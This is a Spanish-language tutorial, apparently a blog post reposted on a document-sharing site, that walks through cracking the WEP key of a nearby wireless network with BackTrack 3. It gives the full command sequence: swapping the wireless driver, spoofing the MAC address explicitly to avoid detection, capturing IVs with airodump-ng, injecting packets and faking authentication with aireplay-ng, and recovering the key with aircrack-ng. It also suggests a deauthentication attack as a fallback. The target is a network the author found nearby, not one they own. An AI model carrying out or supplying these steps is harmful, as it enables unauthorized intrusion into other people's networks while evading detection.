Text

  • October 2019
  • PDF

This document was uploaded by user and they confirmed that they have the permission to share it. If you are author or own the copyright of this book, please report to us by using this DMCA report form. Report DMCA


Overview

Download & View Text as PDF for free.

More details

  • Words: 416
  • Pages: 2
Hoy día hay muchos tutoriales en internet en los cuales se muestra la forma de obtener la clave para redes WiFi protegidas por el protocolo WEP. Pero como siempre he dicho, lo mejor de todo es probarlo, así que, recientemente baje la imagen iso de Black Track 3 y puse manos a la obra. Detecte fácilmente unas cinco redes con el escenario ideal, después de seleccionar una de ellas, procedí a iniciar la inyección de paquetes con el fin de utiliza un método estadístico para determinar la clave de la red. El primer escollo en el camino, la tarjeta inalámbrica de mi laptop (Dell D620) no soporta de manera directa la inyección de paquetes (driver iwl3945), por lo que es necesario, ya sea aplicar los parches o en su caso la utilización de un drive genérico. Procedemos a descarga el driver y carga el nuevo. $ rmmod iwl3945 $modprobe ipwraw Procederemos a cambiar la Mac adress de la lap, no sea que nos detecten $macchanger –m 00:11:12:13:14:15 Checamos la redes y obtenemos el essid y el bssid , así como el canal donde trasmite y por supuesto, estar seguros que utiliza una encriptación WEP. $airodump-ng wifi0 # el wifi0 es la interfaz que se levanta con el controlador ipwraw Ahora Procedemos a capturar lo IV’s $airodump-ng –c CANAL –w BITACORA wifi0 Debemos sustituir CANAL por el numero del canal donde trasmite el AP seleccionado y BITACORA por el nombre de un archive en donde se guardara la información En otra ventana procedemos al envió de paquetes $aireplay-ng -3 –b MAC_DEL_AP -h MAC_NUESTRA (00:11:12:13:14:15) wifi0 En otra ventana hacemos el hack $aireplay-ng -1 0 –e ESSID –a MAC_DEL_AP –h MAC_NUESTRA (00:11:12:13:14:15) wifi0 Si todo esta ok, Se observará el envió y captura de paquetes, es necesario esperar unos 5 o 10 minutos de tal forma que la bitácora obtenga la mayor cantidad de IV’s posibles. Una vez que ha pasado es tiempo, procedemos ha determinar la clave, detenemos la captura de paquetes de la ventana donde se generan. $aircrack-ng BITACORA-01.cap Nos pide seleccionar el número de red a la cual se le aplico la inyección de paquetes. Y si tenemos un buen numero de IV’s obtendremos la Clave WEP.

Notas: En algunas ocasiones el Hack de autentificación no funciona, sin embargo, podemos tratar de generar trafico por medio de un ataque de Death, tardaremos mucho mas tiempo, tal vez una 4 o 5 hrs, pero finalmente, que tanto es ese tiempo si al final logramos el objetivo.

Related Documents

Text
October 2019 63
Text
November 2019 59
Text
May 2020 38
Text
May 2020 42
Text
October 2019 64
Text
December 2019 53